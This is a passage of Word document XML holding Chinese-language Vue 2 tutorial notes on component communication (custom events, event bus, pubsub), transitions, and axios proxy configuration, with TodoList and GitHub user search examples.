        </w:rPr>
        <w:t>render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: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DCDCAA"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>h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=&gt;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DCDCAA"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>h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(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App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//3秒后销毁vm,所有子组件vc都会被销毁,自定义事件也销毁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/* mounted() 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        setTimeout(()=&gt;{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            this.$destroy()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        },3000)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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TodoList自定义事件实现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973580" cy="171450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"todo-wrap"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&lt;!--给MyHeader绑定addTodo自定义事件--&gt;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&lt;!--给MyFooter绑定checkAllTodo和clearAllTodo自定义事件--&gt;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'./components/MyHeader'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'./components/MyList'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'./components/MyFooter.vue'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//由于todos是MyHeader组件和MyFooter组件都在使用，所以放在App中（状态提升）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 || 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//添加一个todo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//全选or取消全选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//清除所有已经完成的todo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deep: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/*base*/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#da4f49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.todo-wrap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·MyHeader.vue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"todo-header"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"请输入你的任务名称，按回车键确认"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keyup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'nanoid'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'MyHeader'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//收集用户输入的title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//校验数据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(!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trim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())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'输入不能为空'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//将用户的输入包装成一个todo对象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//将todoObj通过自定义事件传给App组件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//通知App组件去添加一个todo对象,可传递任意个参数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this.$emit('addTodo',todoObj,1,2,3)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'addTodo'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//清空输入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/*header*/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560px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28px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#ccc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7px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236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0.075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168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236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·MyFooter.vue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"todo-footer"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type="checkbox" :checked="isAll" @change="checkAll"/&gt;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已完成{{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/ 全部{{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btn-danger"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清除已完成任务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'MyFooter'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//总数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length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//已完成数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doneTotal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//此处使用reduce方法做条件统计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const x = this.todos.reduce((pre,current)=&gt;{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console.log('@',pre,current)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return pre + (current.done ? 1 : 0)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},0)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//简写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reduce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 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?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//控制全选框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isAll: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//全选框是否勾选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&amp;&amp;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total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&gt;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//isAll被修改时set被调用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this.checkAllTodo(value)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//将isAll通过自定义事件传给App组件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'checkAllTodo'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checkAll(e){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this.checkAllTodo(e.target.checked)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//清空所有已完成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this.clearAllTodo()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//调用自定义事件告诉App组件清空已完成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'clearAllTodo'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/*footer*/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position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relative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全局事件总线（GlobalEventBus）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5172710" cy="3230245"/>
            <wp:effectExtent l="0" t="0" r="8890" b="635"/>
            <wp:docPr id="61" name="图片 61" descr="7696c0def79c2fdbb47c57728b68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7696c0def79c2fdbb47c57728b688c5"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId60"/>
                    <a:srcRect l="8573" t="4637" b="4019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</w:t>
      </w:r>
      <w:r>
        <w:t>一种组件间通信的方式，适用于任意组件间通信</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>安装全局事件总线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.prototype.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//安装全局事件总线，$bus就是当前应用的vm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 </w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·使用事件总线</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 接收数据：A组件想接收数据，则在A组件中给$bus绑定自定义事件，事件的回调留在A组件自身。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methods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){......}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'xxxx'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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>提供数据：```this.$bus.$emit('xxxx',数据)```</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>最好在beforeDestroy钩子中，用$off去解绑当前组件所用到的事件。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356360" cy="1249680"/>
            <wp:effectExtent l="0" t="0" r="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6A9955"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
          <w:lang w:bidi="ar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//安装全局事件总线,创建bus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"school"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console.log('School',this)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//给bus绑定自定义事件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'我是School组件，收到了数据'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//销毁之前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//给bus解绑自定义事件,千万别什么都不写,会解绑所有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sendStudentName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把学生名给School组件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console.log('Student',this.x)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sendStudentName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//调用School绑定的自定义事件,并将数据发送过去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"less"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"app"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gray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pacing w:after="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·父给子传数据用props</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·子给父传数据用自定义事件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·其他关系用全局事件总线</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TodoList事件总线实现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798320" cy="174498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//安装全局事件总线,创建bus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"todo-wrap"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'./components/MyHeader'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'./components/MyList'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'./components/MyFooter.vue'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//由于todos是MyHeader组件和MyFooter组件都在使用，所以放在App中（状态提升）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 || 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//添加一个todo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//全选or取消全选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//清除所有已经完成的todo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deep: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//挂载完成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//给bus绑定checkTodo和deleteTodo自定义事件,用于接收MyItem发送过来的数据,并设置事件回调函数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//销毁之前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/*base*/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#da4f49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.todo-wrap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/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·MyList.vue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"todo-main"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'./MyItem'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'MyList'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//声明接收App传递过来的数据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/*main*/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.todo-main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.todo-empty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·MyItem.vue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如下代码也能实现功能，但是不太推荐，因为有点违反原则，因为修改了props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type="checkbox" v-model="todo.done"/&gt;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btn-danger"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删除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'MyItem'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//通知App组件将对应的todo对象的done值取反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this.checkTodo(id)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//调用bus的自定义事件,将id发送给App组件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confirm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'确定删除吗？'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//通知App组件将对应的todo对象删除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this.deleteTodo(id)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//调用bus的自定义事件,将id发送给App组件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/*item*/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list-style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position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relative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li:before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initial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li:last-child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消息订阅与发布（pubsub）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·一种组件间通信的方式，适用于任意组件间通信。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·使用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 安装pubsub：npm i pubsub-js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 引入: import pubsub from 'pubsub-js'</w:t>
      </w:r>
    </w:p>
    <w:p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- 接收数据：A组件想接收数据，则在A组件中订阅消息，订阅的回调留在A组件自身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methods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){......}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'xxx'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//订阅消息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·提供数据：pubsub.publish('xxx',数据)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·最好在beforeDestroy钩子中，用PubSub.unsubscribe(pid)去取消订阅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356360" cy="1348740"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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·School.vue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"school"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学校名称：{{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学校地址：{{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//引入pubsub-js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'pubsub-js'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address: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'北京'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挂载完成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console.log('School',this)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this.$bus.$on('hello',(data)=&gt;{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console.log('我是School组件，收到了数据',data)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//订阅消息,消息名为hello,并写上回调函数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//回调函数第一个参数是消息名,其余都是发送过来的数据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//要把返回值赋值给this.pubId,用于取消订阅,类型定时器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///使用箭头函数,这里的是vc,如果使用function,this则是undefined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console.log('有人发布了hello消息，hello消息的回调执行了',msgName,data)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//销毁之前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this.$bus.$off('hello')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//取消订阅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·Student.vue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"student"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学生姓名：{{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学生性别：{{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sendStudentName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把学生名给School组件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//引入pubsub-js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'pubsub-js'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'Student'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sex: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console.log('Student',this.x)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sendStudentName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this.$bus.$emit('hello',this.name)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//给School发布消息,指定消息名和要发送的数据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publish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"less"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"app"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'./components/Student'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'./components/School'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Student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'你好啊！'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gray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·尽量使用全局事件总线，pubsub不能使用插件查看</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TodoList消息订阅与发布实现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·要修改的目录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1615440" cy="1562100"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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"todo-wrap"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//引入pubsub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'pubsub-js'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'./components/MyHeader'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'./components/MyList'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'./components/MyFooter'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//由于todos是MyHeader组件和MyFooter组件都在使用，所以放在App中（状态提升）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 || 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//添加一个todo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//删除一个todo,这里要注意,第一个参数是消息名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_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//全选or取消全选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//清除所有已经完成的todo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deep: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//订阅消息,并写好回调函数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//取消订阅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/*base*/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#da4f49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.todo-wrap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·MyItem.vue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如下代码也能实现功能，但是不太推荐，因为有点违反原则，因为修改了props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type="checkbox" v-model="todo.done"/&gt;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btn-danger"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删除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//引入pubsub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'pubsub-js'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'MyItem'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//通知App组件将对应的todo对象的done值取反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this.checkTodo(id)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confirm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'确定删除吗？'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//通知App组件将对应的todo对象删除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this.deleteTodo(id)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this.$bus.$emit('deleteTodo',id)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//发布消息,将id传给App组件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publish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/*item*/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list-style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position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relative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li:before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initial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li:last-child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pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>NextTick</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(生命周期钩子)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·语法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- this.$nextTick(回调函数)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·作用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 在下一次 DOM 更新结束后执行其指定的回调</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·什么时候用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 当改变数据后，要基于更新后的新DOM进行某些操作时，要在nextTick所指定的回调函数中执行</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TodoList编辑功能实现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607820" cy="1638300"/>
            <wp:effectExtent l="0" t="0" r="7620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"todo-wrap"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'pubsub-js'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'./components/MyHeader'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'./components/MyList'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'./components/MyFooter'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MyHeader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MyFooter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//由于todos是MyHeader组件和MyFooter组件都在使用，所以放在App中（状态提升）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parse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 || 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//添加一个todo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//更新一个todo,编辑后的回调函数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//遍历todos,根据id找到todo,修改title的值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//删除一个todo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_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!==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//全选or取消全选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//清除所有已经完成的todo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clearAllTodo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filter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watch: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deep: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stringify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checkTodo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//给bus绑定updateTodo自定义事件,并写好回调函数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updateTodo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deleteTodo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beforeDestroy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//解绑自定义事件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unsubscribe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/*base*/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body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inline-block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box-shadow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255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0.05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#da4f49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编辑按钮的样式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rgb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159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180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.btn-danger:hover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#fff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#bd362f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.btn:focus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outline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auto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.todo-wrap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·MyItem.vue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"checkbox"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checked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如下代码也能实现功能，但是不太推荐，因为有点违反原则，因为修改了props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&lt;input type="checkbox" v-model="todo.done"/&gt;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任务名,非编辑状态的时候显示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span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编辑输入框,编辑状态的时候显示,并单向绑定title,绑定blur失去焦点事件,传入todo和event事件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blur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handleBlur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$event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"inputTitle"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btn-danger"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删除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添加编辑按钮,非编辑状态的时候才能显示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"btn btn-edit"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编辑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'pubsub-js'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'MyItem'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//声明接收todo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//勾选or取消勾选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handleCheck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//通知App组件将对应的todo对象的done值取反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this.checkTodo(id)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'checkTodo'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//删除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handleDelete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confirm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'确定删除吗？'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//通知App组件将对应的todo对象删除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this.deleteTodo(id)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this.$bus.$emit('deleteTodo',id)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pubsub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publish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'deleteTodo'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//编辑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//如果有isEdit属性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hasOwnProperty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'isEdit'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//变为可编辑状态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console.log('@')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//使用$set方法添加isEdit属性,并将值变为可编辑状态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$set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'isEdit'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//此时input框还未显示,不能获取焦点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this.$refs.inputTitle.focus()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//$nextTick在下一次 DOM 更新结束后执行,也可以用定时器解决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$nextTick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function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$refs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inputTitle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focus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//失去焦点回调（真正执行修改逻辑）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handleBlur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//变为不可编辑状态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isEdit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//如果输入的值为空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trim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())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'输入不能为空！'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//将修改的todo.id和修改的值传给App组件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'updateTodo'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/*item*/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list-style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cursor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pointer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label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vertical-align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middle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position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relative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li:before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initial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li:last-child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none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li:hover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block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过渡与动画</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·作用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 在插入、更新或移除 DOM元素时，在合适的时候给元素添加样式类名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·写法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 准备好样式：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元素进入的样式：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v-enter：进入的起点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v-enter-active：进入过程中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v-enter-to：进入的终点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 元素离开的样式：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v-leave：离开的起点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v-leave-active：离开过程中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 v-leave-to：离开的终点</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·使用&lt;transition&gt;包裹要过度的元素，并配置name属性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"hello"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appear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你好啊！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·备注：若有多个元素需要过度，则需要使用：&lt;transition-group&gt;，且每个元素都要指定key值</w:t>
      </w:r>
    </w:p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219200" cy="1493520"/>
            <wp:effectExtent l="0" t="0" r="0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动画效果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·Test.vue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&lt;!--动画效果--&gt;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显示/隐藏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transition包裹的元素会有动画效果,name为动画名,如果不设置name属性,动画名默认为v,appear会让元素有初始的显示动画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"hello"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appear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你好啊！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'Test'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显示动画,动画名+-enter-active,无动画名则为v-enter-active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.hello-enter-active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关键帧名,动画时长,匀速播放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animation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atguigu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0.5s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linear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消失动画,动画名+-leave-active,无动画名则为v-leave-active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.hello-leave-active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关键帧名,动画时长,匀速播放,反向播放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animation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atguigu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0.5s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linear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reverse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定义关键帧设置动画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@keyframes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atguigu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from{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translateX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to{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translateX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t>过渡效果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·Test2.vue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&lt;!--过渡效果--&gt;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显示/隐藏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单个元素过渡效果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&lt;transition name="hello" appear&gt;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&lt;h1 v-show="isShow" key="2"&gt;尚硅谷！&lt;/h1&gt;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&lt;/transition&gt;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多个元素过渡效果,使用transition-group,需要匹配key值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transition-group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"hello"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appear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你好啊！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尚硅谷！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transition-group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'Test'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如果不写显示动画和消失动画,就使用以下代码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transition: 0.5s linear;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进入的起点(显示动画的起点)、离开的终点(消失动画的终点)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.hello-leave-to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translateX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-100%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显示动画和消失动画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.hello-enter-active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.hello-leave-active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transition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0.5s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linear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进入的终点(显示动画的终点)、离开的起点(消失动画的起点)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.hello-enter-to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.hello-leave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translateX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4"/>
      </w:pPr>
      <w:r>
        <w:t>集成第三方动画</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·Test3.vue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&lt;!--集成第三方动画--&gt;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&lt;!--需要先安装animate.css,npm install animate.css --save--&gt;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&lt;!--使用方法参考以下网站--&gt;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&lt;!--https://animate.style/--&gt;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显示/隐藏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name的值是固定的,为animate__animated animate__bounce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enter-active-class是进入动画,在官网右侧选一个值,点击复制按钮,粘贴过来即可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leave-active-class是离开动画,在官网右侧选一个值,点击复制按钮,粘贴过来即可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transition-group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appear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"animate__animated animate__bounce"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enter-active-class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"animate__swing"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leave-active-class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"animate__backOutUp"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="!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你好啊！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尚硅谷！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transition-group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//引入animate.css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'animate.css'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'Test'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isShow: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Test2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Test3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'./components/Test'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'./components/Test2'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'./components/Test3'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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TodoList增加动画效果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386840" cy="1752600"/>
            <wp:effectExtent l="0" t="0" r="0" b="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"todo-main"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&lt;!--给每一个item组件加上动画效果--&gt;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transition-group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"todo"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appear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todoObj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transition-group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'./MyItem'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'MyList'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MyItem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//声明接收App传递过来的数据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'todos'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/*main*/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.todo-main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.todo-empty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line-height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40px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#ddd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设置动画效果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.todo-enter-active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animation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atguigu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0.5s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linear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.todo-leave-active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animation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atguigu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0.5s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linear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reverse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@keyframes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atguigu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from{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translateX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to{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transform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translateX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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>Vue 中的 ajax</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·先启动node服务器，可获取学生信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="991235"/>
            <wp:effectExtent l="0" t="0" r="3175" b="146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52500"/>
            <wp:effectExtent l="0" t="0" r="3175" b="762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·安装axios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- npm i axios --save</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>vue脚手架配置代理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·作用：解决ajax请求跨域问题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>方法一</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>在vue.config.js中添加如下配置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devServer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:{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proxy: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"http://localhost:5000"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}</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·说明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 优点：配置简单，请求资源时直接发给前端（8080）即可。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 缺点：不能配置多个代理，不能灵活的控制请求是否走代理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 工作方式：若按照上述配置代理，当请求了前端不存在的资源时，那么该请求会转发给服务器 （优先匹配前端资源）</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>方法二</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·编写vue.config.js配置具体代理规则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module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exports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devServer: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proxy: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'/api1'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匹配所有以 '/api1'开头的请求路径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'http://localhost:5000'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代理目标的基础路径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changeOrigin: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pathRewrite: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'^/api1'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'/api2'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匹配所有以 '/api2'开头的请求路径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'http://localhost:5001'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代理目标的基础路径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changeOrigin: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pathRewrite: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'^/api2'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changeOrigin设置为true时，服务器收到的请求头中的host为：localhost:5000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changeOrigin设置为false时，服务器收到的请求头中的host为：localhost:8080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changeOrigin默认值为true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*/</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·说明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 优点：可以配置多个代理，且可以灵活的控制请求是否走代理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 缺点：配置略微繁琐，请求资源时必须加前缀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562100" cy="1988820"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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·vue.config.js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module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exports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pages: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page 的入口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entry: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'src/main.js'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lintOnSave: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//关闭语法检查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//第一种配置代理方法，开启代理服务器，代理5000端口，这种方式不能配置多个代理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devServer:{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proxy:"http://localhost:5000"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devServer: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proxy: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'/api1'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匹配所有以 '/api1'开头的请求路径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'http://localhost:5000'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代理目标的基础路径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changeOrigin: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//用于控制请求头中的host值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ws:true,//用于支持websocket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//默认路径是/api1/xxx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pathRewrite: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'^/api1'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//重写路径，匹配所有/api1开头的路径，将/api1替换为空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'/api2'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匹配所有以 '/api2'开头的请求路径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'http://localhost:5001'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代理目标的基础路径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changeOrigin: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pathRewrite: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'^/api2'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changeOrigin设置为true时，服务器收到的请求头中的host为：localhost:5000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changeOrigin设置为false时，服务器收到的请求头中的host为：localhost:8080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changeOrigin默认值为true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getStudents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获取学生信息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getCars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获取汽车信息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//引入axios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'axios'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//获取学生信息按钮回调函数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getStudents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//通过ajax获取学生信息并接收返回的promise,通过then接收返回的数据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//第一种代理方式，代理服务器的端口是8080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axios.get('http://localhost:8080/students').then(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response =&gt;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console.log('请求成功了',response.data)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error =&gt;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console.log('请求失败了',error.message)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//第一种代理方式，代理服务器的端口是8080，需要添加配置的前缀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'http://localhost:8080/api1/students'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then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'请求成功了'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'请求失败了'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getCars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'http://localhost:8080/api2/cars'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then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'请求成功了'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'请求失败了'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pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>github 用户搜索案例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·效果</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="2345690"/>
            <wp:effectExtent l="0" t="0" r="7620" b="127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·接口地址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"https://api.github.com/search/users?q=xxx" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>https://api.github.com/search/users?q=xxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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851660" cy="2514600"/>
            <wp:effectExtent l="0" t="0" r="7620" b="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·引入bootstrap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="2580640"/>
            <wp:effectExtent l="0" t="0" r="2540" b="10160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·安装全局事件总线</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="3705860"/>
            <wp:effectExtent l="0" t="0" r="3810" b="12700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·Search.vue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section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"jumbotron"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"jumbotron-heading"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Search Github Users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&lt;!--双向绑定--&gt;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"enter the name you search"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&amp;nbsp;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searchUsers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Search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section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//引入axios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'axios'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'Search'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//初始化搜索框的值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搜索按钮回调事件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searchUsers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//请求前更新List的数据,加载中,没有错误信息,用户数据为空,不是初次展示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'updateListData'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isLoading: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[],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isFirst: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//通过github的api获取用户信息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`https://api.github.com/search/users?q=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${this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keyWord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}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`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then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//请求成功后返回数据，便于分析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'请求成功了'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//请求成功后更新List的数据，将数据封装成对象发送给list组件,非加载中,错误信息为空,用户列表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'updateListData'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isLoading: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users:response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items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//请求失败后更新List的数据，将数据封装成对象发送给list组件,非加载中,错误信息,用户列表为空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$emit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'updateListData'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isLoading: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errMsg:error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[]})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·List.vue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"row"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如果users数组有数据时,展示用户列表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v-for="user in info.users"遍历收到的用户信息，key为用户名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length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"card"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:href连接地址单向绑定为用户主页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html_url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target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"_blank"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头像单向绑定为用户头像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avatar_url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'width: 100px'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用户名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"card-text"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login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初次展示时,展示欢迎词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isFirst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欢迎使用！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处于加载中时,展示加载中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isLoading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加载中....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出错时,errMsg有数据,展示错误信息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'List'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isFirst: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//是否为初次展示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isLoading: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//是否处于加载中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errMsg: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//错误信息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users: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//给bus添加updateListData自定义事件，并写上回调函数,得到一个数据对象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$on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'updateListData'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console.log({...this.info});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console.log({...dataObj});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console.log({...this.info,...dataObj});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//将this.info和dataObj两个对象展开,并合并成一个对象,相同属性的值使用后边的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{...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info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,...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.album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min-height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50rem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Can be removed; just added for demo purposes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padding-top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3rem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3rem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#f7f7f7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.card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float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33.333%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padding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.75rem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2rem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solid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#efefef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.card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&gt;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margin-bottom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.75rem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border-radius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.card-text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font-size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85%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vue-resource</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
